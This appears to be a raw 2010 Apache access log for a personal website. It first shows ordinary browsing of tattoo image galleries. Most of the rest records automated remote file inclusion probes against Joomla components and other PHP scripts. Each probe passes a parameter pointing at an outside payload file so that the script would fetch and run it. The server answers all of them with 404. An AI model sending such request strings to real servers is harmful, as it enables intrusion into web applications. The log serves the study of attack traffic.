64.180.76.102 - - [09/Apr/2010:01:08:11 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:11 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:29 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:29 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:29 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:29 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:29 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:29 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:29 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:29 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:29 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:29 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:29 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:47 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:47 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:47 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:47 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:47 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:47 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:47 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:47 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:47 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:47 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:08:47 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:09:13 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:09:13 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:09:13 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:09:13 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:09:13 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:09:13 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:09:13 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:09:14 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:09:14 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:09:14 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:09:36 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:09:36 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:09:37 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.180.76.102 - - [09/Apr/2010:01:09:37 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
218.97.241.67 - - [09/Apr/2010:01:10:57 -0500] "GET /logs/access_log.1219708800//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://danangportvn.com:32000//1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
218.97.241.67 - - [09/Apr/2010:01:10:58 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://danangportvn.com:32000//1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.97.241.67 - - [09/Apr/2010:01:10:58 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://danangportvn.com:32000//1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
222.122.197.37 - - [09/Apr/2010:01:13:13 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:13:13 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:14:55 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:14:55 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:18:17 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:18:17 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
211.239.124.204 - - [09/Apr/2010:01:18:23 -0500] "GET /logs/access_log.1219708800/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 371 "-""Mozilla/5.0"
211.239.124.204 - - [09/Apr/2010:01:18:39 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
211.239.124.204 - - [09/Apr/2010:01:18:39 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
211.239.124.204 - - [09/Apr/2010:01:18:41 -0500] "GET /logs/access_log.1219708800/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 371 "-""Mozilla/5.0"
211.203.180.144 - - [09/Apr/2010:01:19:29 -0500] "GET //SSI.php?sourcedir=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
211.203.180.144 - - [09/Apr/2010:01:19:29 -0500] "GET //SSI.php?sourcedir=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
211.203.180.144 - - [09/Apr/2010:01:19:29 -0500] "GET /logs//SSI.php?sourcedir=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
211.203.180.144 - - [09/Apr/2010:01:19:29 -0500] "GET /logs/access_log.1268956800//SSI.php?sourcedir=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.203.180.144 - - [09/Apr/2010:01:19:29 -0500] "GET /logs//SSI.php?sourcedir=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
211.203.180.144 - - [09/Apr/2010:01:19:29 -0500] "GET /logs/access_log.1268956800//SSI.php?sourcedir=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
222.122.197.37 - - [09/Apr/2010:01:20:58 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:20:58 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:24:50 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:24:50 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
207.46.199.53 - - [09/Apr/2010:01:26:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.53 - - [09/Apr/2010:01:27:29 -0500] "GET /logs/access_log.1172275200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.122.197.37 - - [09/Apr/2010:01:28:48 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:28:48 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
92.48.73.232 - - [09/Apr/2010:01:30:05 -0500] "GET /logs//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
92.48.73.232 - - [09/Apr/2010:01:30:05 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
205.234.252.102 - - [09/Apr/2010:01:30:08 -0500] "GET /logs/access_log.1220054400//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
205.234.252.102 - - [09/Apr/2010:01:30:08 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
205.234.252.102 - - [09/Apr/2010:01:30:08 -0500] "GET /logs//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
217.23.8.91 - - [09/Apr/2010:01:30:34 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.831"
213.163.85.40 - - [09/Apr/2010:01:30:35 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.834"
213.163.85.40 - - [09/Apr/2010:01:30:40 -0500] "GET /logs//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.834"
213.163.85.40 - - [09/Apr/2010:01:30:41 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.834"
82.141.129.16 - - [09/Apr/2010:01:30:50 -0500] "GET /logs//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
82.141.129.16 - - [09/Apr/2010:01:30:50 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
217.23.8.91 - - [09/Apr/2010:01:31:01 -0500] "GET /logs//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.831"
217.23.8.91 - - [09/Apr/2010:01:31:01 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.831"
205.234.252.102 - - [09/Apr/2010:01:31:09 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
92.48.73.232 - - [09/Apr/2010:01:31:13 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
82.141.129.16 - - [09/Apr/2010:01:31:14 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
70.98.34.37 - - [09/Apr/2010:01:31:15 -0500] "GET /logs//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
70.98.34.37 - - [09/Apr/2010:01:31:15 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
92.48.73.232 - - [09/Apr/2010:01:31:15 -0500] "GET /logs/access_log.1220054400//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
92.48.73.232 - - [09/Apr/2010:01:31:15 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
92.48.73.232 - - [09/Apr/2010:01:31:16 -0500] "GET /logs//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
94.136.59.102 - - [09/Apr/2010:01:31:24 -0500] "GET /logs//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
94.136.59.102 - - [09/Apr/2010:01:31:24 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
94.136.59.102 - - [09/Apr/2010:01:31:26 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
217.23.8.91 - - [09/Apr/2010:01:31:55 -0500] "GET /logs/access_log.1220054400//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.831"
217.23.8.91 - - [09/Apr/2010:01:31:55 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.831"
217.23.8.91 - - [09/Apr/2010:01:31:55 -0500] "GET /logs//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.831"
70.98.34.37 - - [09/Apr/2010:01:32:16 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
222.122.197.37 - - [09/Apr/2010:01:32:37 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:32:37 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
80.235.24.38 - - [09/Apr/2010:01:32:58 -0500] "GET /logs//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.831"
80.235.24.38 - - [09/Apr/2010:01:32:58 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.831"
80.235.24.38 - - [09/Apr/2010:01:33:10 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.831"
218.188.17.18 - - [09/Apr/2010:01:34:09 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
70.98.34.37 - - [09/Apr/2010:01:34:12 -0500] "GET /logs/access_log.1220054400//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
70.98.34.37 - - [09/Apr/2010:01:34:12 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
70.98.34.37 - - [09/Apr/2010:01:34:12 -0500] "GET /logs//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
220.232.195.131 - - [09/Apr/2010:01:34:14 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
222.122.197.37 - - [09/Apr/2010:01:34:43 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:34:43 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
89.149.241.209 - - [09/Apr/2010:01:35:01 -0500] "GET /logs/access_log.1216512000//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://kucing10.fileave.com/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
89.149.241.209 - - [09/Apr/2010:01:35:01 -0500] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://kucing10.fileave.com/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
89.149.241.209 - - [09/Apr/2010:01:35:01 -0500] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://kucing10.fileave.com/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
89.149.241.209 - - [09/Apr/2010:01:35:08 -0500] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
89.149.241.209 - - [09/Apr/2010:01:35:08 -0500] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
89.149.241.209 - - [09/Apr/2010:01:35:08 -0500] "GET /logs/access_log.1216512000//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
79.98.23.9 - - [09/Apr/2010:01:35:14 -0500] "GET /logs/phphtml.php?htmlclass_path=http://kucing10.fileave.com/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
79.98.23.9 - - [09/Apr/2010:01:35:14 -0500] "GET /phphtml.php?htmlclass_path=http://kucing10.fileave.com/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
79.98.23.9 - - [09/Apr/2010:01:35:14 -0500] "GET /logs/access_log.1219708800%20%20/phphtml.php?htmlclass_path=http://kucing10.fileave.com/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
79.98.23.9 - - [09/Apr/2010:01:35:22 -0500] "GET /phphtml.php?htmlclass_path=http://kucing10.fileave.com/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
79.98.23.9 - - [09/Apr/2010:01:35:22 -0500] "GET /logs/phphtml.php?htmlclass_path=http://kucing10.fileave.com/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
92.48.73.232 - - [09/Apr/2010:01:35:25 -0500] "GET /logs/access_log.1222473600//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
